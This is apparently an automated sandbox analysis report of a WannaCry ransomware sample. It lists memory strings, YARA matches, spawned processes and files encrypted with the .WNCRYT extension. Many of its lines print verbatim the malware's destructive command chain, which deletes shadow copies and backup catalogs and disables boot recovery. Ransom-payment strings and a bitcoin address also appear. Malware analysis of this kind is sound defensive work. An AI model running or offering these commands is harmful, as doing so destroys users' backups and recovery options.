              Source: taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKS
              Source: @WanaDecryptor@.exe, 00000052.00000002.2339486528.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000055.00000002.1589418005.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.1583977625.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005C.00000002.1584848304.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005F.00000002.1586153016.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000060.00000002.1587347770.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000063.00000002.1588770420.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000065.00000002.1590413504.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000068.00000002.1591580605.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000069.00000002.1593109838.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006A.00000002.1594769324.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006C.00000002.1596337196.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006E.00000002.1599571092.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006F.00000002.1600918230.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000070.00000002.1601807638.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000072.00000002.1603420323.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000074.00000002.1604662482.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000076.00000002.1605940913.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000077.00000002.1607353552.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000007B.00000002.1608972570.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000007C.00000002.1610429686.0000000000421000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.google.com/search?q=how
              Source: taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.torproject.org/
              Source: taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
              Source: taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
              Source: taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.torproject.org/download/download#warning
              Source: taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 4928, type: MEMORYSTR
              Source: Yara matchFile source: WannaCry.bin, type: SAMPLE
              Source: Yara matchFile source: 0000000F.00000003.1474514530.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000004F.00000000.1576842950.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: WannaCry.exe PID: 7080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 4928, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\Desktop\u.wnry, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\Desktop\WannaCry.bin, type: DROPPED
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: WannaCry.exe, 0000000F.00000003.1474514530.00000000009A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: WannaCry.exe, 0000000F.00000003.1474514530.00000000009A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
              Source: @WanaDecryptor@.exe, 0000004F.00000000.1576842950.000000000041F000.00000008.00000001.01000000.0000000B.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: @WanaDecryptor@.exe, 0000004F.00000000.1576842950.000000000041F000.00000008.00000001.01000000.0000000B.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
              Source: @WanaDecryptor@.exe, 00000055.00000002.1589306611.000000000019B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: t/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: @WanaDecryptor@.exe, 00000055.00000003.1588441634.0000000000606000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aWindows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33
              Source: @WanaDecryptor@.exe, 00000055.00000003.1588441634.00000000005C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /^XG]runascmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33
              Source: @WanaDecryptor@.exe, 00000055.00000002.1590549100.000000000060F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aWindows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33
              Source: @WanaDecryptor@.exe, 00000055.00000002.1590549100.00000000005D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :[XG]runascmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33
              Source: @WanaDecryptor@.exe, 00000055.00000003.1588441634.00000000005EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: svchost.exe, 0000005D.00000000.1585167954.000002152F613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: svchost.exe, 0000005D.00000000.1585276391.000002152F62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quieta
              Source: svchost.exe, 0000005D.00000000.1585276391.000002152F62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: svchost.exe, 0000005D.00000002.2332763421.000002152F61F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: svchost.exe, 0000005D.00000002.2334488235.000002152F62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quieta
              Source: svchost.exe, 0000005D.00000002.2334488235.000002152F62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
              Source: cmd.exe, 00000061.00000002.1616042905.0000000002C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
              Source: cmd.exe, 00000061.00000002.1616042905.0000000002C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\SysWOW64\cmd.exeWinSta0\DefaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsOL$1X
              Source: cmd.exe, 00000061.00000002.1616042905.0000000002C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: cmd.exe, 00000061.00000002.1616042905.0000000002C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: cmd.exe, 00000061.00000002.1615795463.00000000008F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\SysWOW64\cmd.exeWinSta0\Default
              Source: cmd.exe, 00000061.00000002.1616694923.0000000003000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\cmd.exe/cvssadmindeleteshadows/all/quiet&wmicshadowcopydelete&bcdedit/set{default}bootstatuspolicyignoreallfailures&bcdedit/set{default}recoveryenabledno&wbadmindeletecatalog-quiet;!
              Source: cmd.exe, 00000061.00000002.1616694923.0000000003000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows\SysWOW64\cmd.exe" c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Users\user\Desktop\WannaCry.exeFile moved: C:\Users\user\Desktop\MXPXCVPDVN.xlsxJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile deleted: C:\Users\user\Desktop\MXPXCVPDVN.xlsxJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile moved: C:\Users\user\Desktop\SFPUSAFIOL\SUAVTZKNFL.jpgJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile deleted: C:\Users\user\Desktop\SFPUSAFIOL\SUAVTZKNFL.jpgJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile moved: C:\Users\user\Desktop\IPKGELNTQY.xlsxJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\WannaCry.bin entropy: 7.99547094116Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRYT entropy: 7.99861120761Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\D-oNnp40DqC4OQCR13oBZlsQ7cc.br[1].js.WNCRYT entropy: 7.99035316616Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRYT entropy: 7.99850339692Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\f8FI06PDUmw1Zws81nUDYY3bWsY.br[1].js.WNCRYT entropy: 7.99603172429Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\HSDak9V_lmtkNU64sorwQW-6T38.br[1].js.WNCRYT entropy: 7.99987969309Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\Ix6gLNUjdsfo1b44Xv9sX0Ilnxw.br[1].js.WNCRYT entropy: 7.99746672381Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRYT entropy: 7.9995860221Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\lh0O3d6Fmm9PYPDqG8PqHJ4MS7w.br[1].js.WNCRYT entropy: 7.99745394441Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\lpbsfnKE_8agtRF97FH08WFLR1w.br[1].js.WNCRYT entropy: 7.99945523185Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRYT entropy: 7.99842479811Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\MR6Zgdyo2coaDBmJxRBOLkPvlpk.br[1].js.WNCRYT entropy: 7.99935784044Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.WNCRYT entropy: 7.99985055088Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\Ov6JSivEymftttgBEDwd3JIRgz0.br[1].js.WNCRYT entropy: 7.99910287575Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.WNCRYT entropy: 7.99981592682Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.WNCRYT entropy: 7.99981704652Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.WNCRYT entropy: 7.99989065799Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\RfoQ_WQ8YccBpTTC1JFx7r-9GWU.br[1].js.WNCRYT entropy: 7.99908198938Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.WNCRYT entropy: 7.99770282325Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\u9BHPK6Ysm_7E45ERhG9lu3epIw.br[1].js.WNCRYT entropy: 7.99685924211Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRYT entropy: 7.99982358503Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\UHyc3IjuWFO6s9IoOlmmJWw7Jqs.br[1].js.WNCRYT entropy: 7.99968258653Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRYT entropy: 7.99996805056Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\x9TiBFKPhYF4yOf0IfKaPIf64qI.br[1].js.WNCRYT entropy: 7.99851960536Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRYT entropy: 7.99946063954Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\xO01H2dEYfjtj69ouv_nR5Al0cU.br[1].js.WNCRYT entropy: 7.99886322641Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\ZNvOyS-r2rT3Al22ByUYXLQ5kPY.br[1].js.WNCRYT entropy: 7.99818001682Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\1J0BS9YB\Dm5sMNO8Bp1gDqDK-DbxdfDD0W4[1].js.WNCRYT entropy: 7.99658945458Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\VR1R6S8L\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRYT entropy: 7.99211679504Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99986745137Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT entropy: 7.99989916794Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRYT entropy: 7.99835456706Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.WNCRYT entropy: 7.9999114694Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRYT entropy: 7.99846396416Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.WNCRYT entropy: 7.99318256794Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.WNCRYT entropy: 7.99988202239Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRYT entropy: 7.99993659258Jump to dropped file
